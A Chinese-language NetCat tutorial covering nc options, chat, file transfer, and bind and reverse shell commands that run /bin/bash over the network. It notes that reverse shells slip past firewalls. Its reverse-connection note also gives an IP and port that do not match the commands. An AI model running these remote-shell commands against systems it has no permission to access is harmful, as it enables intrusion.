简介:

NC(全名NetCat)，在网络界有”瑞士军刀”的美誉。它小巧而强悍，被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接。

使用格式:

nc [options...] hostname port

nc -l -p port [-s addr] [options...] [hostname] [port]

主要参数:

-4 IPv4模式
-6 IPv6模式
-b, –bluetooth 蓝牙模式 (默认为L2CAP协议)

-e,–exec=CMD 连接建立后执行命令

-l 监听入站连接

-n 指定数字的IP地址，不能用hostname 

-u UDP模式

-t TCP模式（默认模式）

-v 详细输出——用两个-v可得到更详细的内容 

-w，–time=SECONDS 连接建立后的延时

-z 扫描模式，不会发送任何数据

-T，–ttl=TTL 自定义初始TTL

-z 将输入输出关掉——用于扫描时 

-x，–transfer 文件传输模式

-X ，–rev-transfer 反向文件传输模式

-s，–address=ADDRESS 本地源ip

使用举例：

1. 交互数据传输（简单聊天):

nc可以作为简单的字符下聊天工具使用:

[本地] nc -lp 1234

[远程] nc 222.24.51.53 1234

2. 正向连接：

注：远程主机（ip：222.24.51.116）上运行nc -l -p 1234 -t -e /bin/bash监听其本地端口，一旦连接建立，就执行其/bin/bash，本地主机连接到远程主机，将已经连接的CMD重定向到1234端口的远程主机。

[远程主机] nc -l -p 1234 -t -e /bin/bash

[本地主机] nc -nvv 222.24.51.116 1234

 3. 反向连接：

注：先在本地主机（拥有公网IP）开启1234 端口并监听等待远程主机连接；在远程主机上将其 CMD 重定向到 IP 地址为 192.168.1.102 端口号为2012 的主机上。

[本地主机] nc -l –vv -p 1234

[远程主机] nc -t -e /bin/bash 222.24.51.53 1234

总结：以上两种连接方式中，反向连接就是反弹shell到本地，因为由远程主机发送的数据请求其本地防火墙一般不会去拦截，故反向更易连接。

4. 文件传输：

从远程主机把ap-wlan0文件传送到本地并重命名为ap-wlan文件：

[本地主机] nc -v -l -p 1234 > ./ap-wlan

[远程主机] nc -vv 222.24.51.53 < /home/linger/ap-wlan0